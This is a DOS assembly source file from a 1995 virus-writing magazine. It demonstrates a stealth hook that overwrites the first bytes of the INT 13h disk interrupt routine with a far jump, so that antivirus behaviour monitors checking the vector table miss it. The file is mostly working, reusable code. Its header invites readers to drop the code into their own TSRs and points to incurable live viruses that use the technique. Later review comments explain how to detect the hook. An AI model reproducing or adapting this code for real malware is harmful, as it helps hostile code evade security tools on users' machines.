;
;
; INTERRUPT PATCH - Stealth structure for your TSR by SiRiUS
; =====================================================================
; Germany (c)1995
;
; Interrupt Patch shows you an advanced technique on how to gain control
; of vital system functions like the interrupts.
;
; The most used and known technique is to -hook- an interrupt by changing
; its interrupt vector in the interrupt vector table (IVT).
; This is very easy and needs no further explanation. Since most of the
; advanced behaviour-scanners (AV-TSR-Scanner) will notice such an obvious
; change in the system configuration, they will recognise it as a
; suspicious action and will probably alert the user. Some of these programs
; will also offer the option to restore the changed vector so that any
; virus which was installed beforehand, will become deactivated.
;
; Interrupt Patch is a prototype of another approach. It will *patch*
; the original interrupt routine and insert a "JMP FAR MySeg:MyOfs" into
; its own code, so no change to the interrupt vector is necessary.
;
; The code below is not a virus, it is a demonstration of the technique
; described above. It makes the speaker click every time interrupt 13h
; is invoked. You may use this code freely in your own TSRs!
; Assemble as usual with TASM or MASM.
;
; If you are interested in seeing a live virus managing this technique
; look at some of the viruses by German author, Neurobasher, such as
; Neuroquila or N8fall. Be careful when experimenting, there is no cure
; program for these polymorphic and multipartite viruses at the moment!
;
; You may contact me in an emergency via my friend at
; an244867@anon.penet.fi
;
; --
;
; Thanks and Hellos to: Tron, rEx, Ferrom, Metal Junkie, Sauron and
; all VX/AV-groups in their fight against primitive and boring self-
; replicating-code... ;)
;
;
;=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/
;-----------------------------------------------------------------------------
; Review notes (defender's view of the technique demonstrated here):
; - The IVT entry for INT 13h is never modified.  Install instead overwrites
;   the first 5 bytes of the routine the vector points to with a far JMP
;   (opcode 0EAh) to New_13_Start.  A check that only compares IVT entries
;   will therefore not see this hook; comparing the first bytes at the vector
;   target against a known-good copy will, since the far JMP is present there
;   at all times except while New_13_Start is calling the original routine.
; - All saved state lives in the single set of variables below and on one
;   fixed private stack (SP is always loaded with StackEnd), so the resident
;   handler is not reentrant.
;-----------------------------------------------------------------------------
Frequency EQU 2600 ;Written by Make_Sound as the PIT channel-2 reload value (a divisor, not Hz)
CODE Segment
ASSUME CS:CODE
ASSUME DS:CODE
ASSUME ES:CODE
ASSUME SS:CODE
ORG 100h ;.COM layout: code starts after the 256-byte PSP
Start:
JMP Install
;---- New Stack -------------------------------------------------------------
Stapel DW 0400h DUP (0) ;Private stack: 0400h words = 2048 bytes (the old "64 Byte" comment was wrong)
StackEnd LABEL Word ;Top of the private stack; New_13_Start loads SP with this offset
;---- Data ------------------------------------------------------------------
@AX DW 0000h ;AX of the interrupted program (saved first, AX is used as scratch)
@SS DW 0000h ;SS:SP of the interrupted program, below the popped INT frame
@SP DW 0000h
@IP_broken DW 0000h ;INT frame popped at New_13_Start: IP, CS, FLAGS
@CS_broken DW 0000h
@Flg_broken DW 0000h ;Masked to IF/TF of the caller; the original routine's result flags are OR'd in before IRET
Far_JMP DB 11101010b ;0EAh = opcode of "JMP FAR seg:off" (5 bytes including operands)
@New_Off DW OFFSET New_13_Start ;Offset part of the far JMP written into the INT 13h routine
Patch_CS DW 0000h ;Segment part of the far JMP; our CS, filled in by Install
@New_Flg DW 0000h ;Not referenced anywhere in this file (unused)
Org_INT_13: ;Far pointer (offset, segment) to the original INT 13h routine; target of CALL DWORD PTR
Org_13_Off DW 0000h
Org_13_Seg DW 0000h
Org_13_1 DB 00h ;Copy of the 5 original bytes (1 + 2 + 2) that the far JMP overwrites
Org_13_2 DW 0000h
Org_13_3 DW 0000h
;-----------------------------------------------------------------------------
; New_13_Start - reached through the far JMP that Install wrote into the
; INT 13h routine.  On entry the stack holds the frame pushed by the INT
; instruction (IP, CS, FLAGS) and all registers are still the caller's.
; Sequence:
;   1. save AX and the INT frame, switch to the private stack;
;   2. save the remaining registers, run the demo payload (speaker click);
;   3. write the original 5 bytes back over the patch, restore the caller's
;      registers and stack, and far-CALL the original INT 13h routine;
;   4. switch to the private stack again and re-write the far JMP patch;
;   5. OR the FLAGS left by the original routine into the caller's IF/TF,
;      rebuild the INT frame on the caller's stack and IRET.
; Not reentrant: the save area (@AX, @SS, @SP, @*_broken) and the private
; stack are single fixed locations, so a second INT 13h taken while this code
; is active would overwrite them.  Whether that can happen (e.g. from an
; interrupt during the original routine) cannot be determined from this file.
;-----------------------------------------------------------------------------
New_13_Start:
MOV CS:@AX,AX ;AX is needed as scratch below, save it first
POP AX
MOV CS:@IP_broken ,AX ;Return IP pushed by the INT instruction
POP AX
MOV CS:@CS_broken ,AX ;Return CS
POP AX
MOV CS:@Flg_broken,AX ;Caller's FLAGS (raw copy; replaced by the masked value below)
MOV CS:@SP,SP
MOV CS:@SS,SS ;Caller's stack, now positioned below the popped INT frame
MOV SP,Offset StackEnd
MOV SS,CS:Patch_CS ;Switch to the private stack
; NOTE(review): here and at the second switch further down SP is written
; before SS, whereas both switches back write SS first and then SP.  An
; interrupt taken between the SP and SS writes would push onto old SS:new SP.
; Whether interrupts can be enabled at these points depends on how INT 13h
; was reached and is not verifiable from this file.
PUSHF ;Save current FLAGS (restored by the POPF below, before the original routine is called)
AND AX,0000001100000000b ;Keep only IF (bit 9) and TF (bit 8) of the caller's FLAGS
MOV CS:@Flg_broken,AX
PUSH BX
PUSH CX
PUSH DX
PUSH BP
PUSH SI
PUSH DI
PUSH DS
PUSH ES ;Preserve everything the payload and the unpatch code below touch
CALL Make_Sound ;Demo payload: click the speaker
MOV ES ,CS:Org_13_Seg
MOV BX ,CS:Org_13_Off ;ES:BX = first byte of the original INT 13h routine
MOV AH ,CS:Org_13_1
MOV ES:BX,AH
MOV AX ,CS:Org_13_2
MOV ES:BX+1,AX
MOV AX ,CS:Org_13_3
MOV ES:BX+3,AX ;Write the saved 5 original bytes back over the far JMP
POP ES
POP DS
POP DI
POP SI
POP BP
POP DX
POP CX
POP BX
MOV AX,CS:@AX ;All caller registers restored
POPF ;FLAGS as saved before the AND above (the AND changed the arithmetic flags)
MOV SS,CS:@SS
MOV SP,CS:@SP ;Back on the caller's stack (SS first, then SP)
PUSHF
CALL DWORD PTR CS:[Org_INT_13] ;PUSHF + far CALL gives the original routine the FLAGS/CS/IP frame an INT would; target is Org_13_Off:Org_13_Seg
; Back from the original INT 13h routine, still on the caller's stack.
MOV SP,Offset StackEnd
MOV SS,CS:Patch_CS ;Private stack again (SP-before-SS order, see note above)
PUSH ES
PUSH BX
PUSH CX ;Only the registers used below are saved; AX etc. keep the routine's results
MOV ES,CS:Org_13_Seg
MOV BX,CS:Org_13_Off
MOV BYTE PTR CH,CS:FAR_JMP
MOV BYTE PTR ES:BX,CH ;Byte 0: 0EAh
MOV WORD PTR CX,CS:@New_Off
MOV WORD PTR ES:BX+1,CX ;Bytes 1-2: offset of New_13_Start
MOV WORD PTR CX,CS:Patch_CS
MOV WORD PTR ES:BX+3,CX ;Bytes 3-4: our segment.  The far JMP is in place again
PUSHF
POP CX ;CX = FLAGS as left by the original routine (nothing since the CALL changes flags)
OR CS:@Flg_broken,CX ;Merge them (e.g. CF) with the caller's IF/TF; OR can only set bits, never clear them
POP CX
POP BX
POP ES
MOV SS,CS:@SS
MOV SP,CS:@SP ;Caller's stack, at the point where the INT frame was popped
PUSH CS:@Flg_broken
PUSH CS:@CS_broken
PUSH CS:@IP_broken ;Rebuild the INT frame: FLAGS, CS, IP
IRET ;Return to the interrupted program
;-----------------------------------------------------------------------------
; Make_Sound - demo payload: briefly drive the PC speaker from PIT channel 2.
; In:    nothing (Frequency EQU is used as the channel-2 reload value)
; Out:   nothing
; Clobb: AX, CX, flags
; The on-time is a fixed-count busy loop, so the click length depends on the
; CPU speed.
;-----------------------------------------------------------------------------
Make_Sound PROC NEAR
        MOV     AL, 0B6h                ; PIT command: channel 2, lo/hi byte, mode 3 (square wave)
        OUT     43h, AL
        IN      AL, 61h                 ; Port B: set bits 0-1 (timer-2 gate + speaker data)
        OR      AL, 3
        OUT     61h, AL
        MOV     AX, Frequency           ; Reload value, low byte first...
        OUT     42h, AL
        MOV     AL, AH
        OUT     42h, AL                 ; ...then high byte
        MOV     CX, 255                 ; Busy-wait while the speaker is on
Sound_Delay:
        DEC     CX
        JNZ     Sound_Delay
        IN      AL, 61h                 ; Clear bits 0-1 again: speaker off
        AND     AL, 0FCh
        OUT     61h, AL
        RET
Make_Sound ENDP
New_13_End: ;End of the resident part; Install and Message below are not kept in memory
;=========================================================================
; This installs us in memory
;=========================================================================
; Install - executed once from Start.  Records our segment, reads the current
; INT 13h vector (INT 21h/35h), saves the first 5 bytes of the routine it
; points to, overwrites them with "JMP FAR Patch_CS:New_13_Start", prints
; Message and terminates resident (INT 21h/31h) keeping
; (OFFSET New_13_End + 15) / 16 paragraphs.  The IVT itself is left as is.
; No check is made that ES:BX refers to writable memory; that is assumed.
;=========================================================================
Install:
CLI ;Disable interrupts around the patch sequence (paired with STI below)
PUSH CS
POP AX
MOV Patch_CS,AX ;Our SEGMENT; becomes the segment part of the far JMP
MOV AX,3513h
INT 21h ;DOS get vector: ES:BX = current INT 13h routine
MOV Org_13_Seg,ES
MOV Org_13_Off,BX ;Save it as the far pointer at Org_INT_13 (used by the far CALL in New_13_Start)
MOV AH,ES:BX
MOV Org_13_1,AH
MOV AX,ES:BX+1
MOV Org_13_2,AX
MOV AX,ES:BX+3 ;Save the first 5 bytes of the routine (1 + 2 + 2) so that
MOV Org_13_3,AX ;New_13_Start can restore them before chaining
MOV BYTE PTR CH,FAR_JMP
MOV BYTE PTR ES:BX,CH ;Byte 0: 0EAh (JMP FAR opcode)
MOV WORD PTR CX,@New_Off
MOV WORD PTR ES:BX+1,CX ;Bytes 1-2: offset of New_13_Start
MOV WORD PTR CX,Patch_CS
MOV WORD PTR ES:BX+3,CX ;Bytes 3-4: our segment (same 5-byte write as the re-patch in New_13_Start)
MOV AH,09h
MOV DX,Offset Message
INT 21h ;DOS print string: show the install message
MOV AX, OFFSET New_13_End
MOV CL, 4
ADD AX, 0Fh
SHR AX, CL ;Round up to 16-byte paragraphs
MOV DX, AX ;DX = paragraphs to keep, counted from the segment start (PSP included via ORG 100h)
STI
MOV AX, 3100h
INT 21h ;DOS terminate-and-stay-resident, DX paragraphs
;---- Install message (not resident: placed after New_13_End) ---------------
; Printed once by Install through INT 21h/09h, hence the '$' terminator.
Message DB 10d,13d
DB '· INTERRUPT PATCH by SiRiUS/Germany for VLAD Magazine',10d,13d
DB '--------------------------------------------------95-',10d,13d
DB ' Presentation of the -slicing- interrupt technique. ',10d,13d
DB 13d,10d
DB 13d,10d
DB 13d,10d,'$' ;'$' ends the DOS string
Code ENDS
END Start ;Entry point: Start (JMP Install)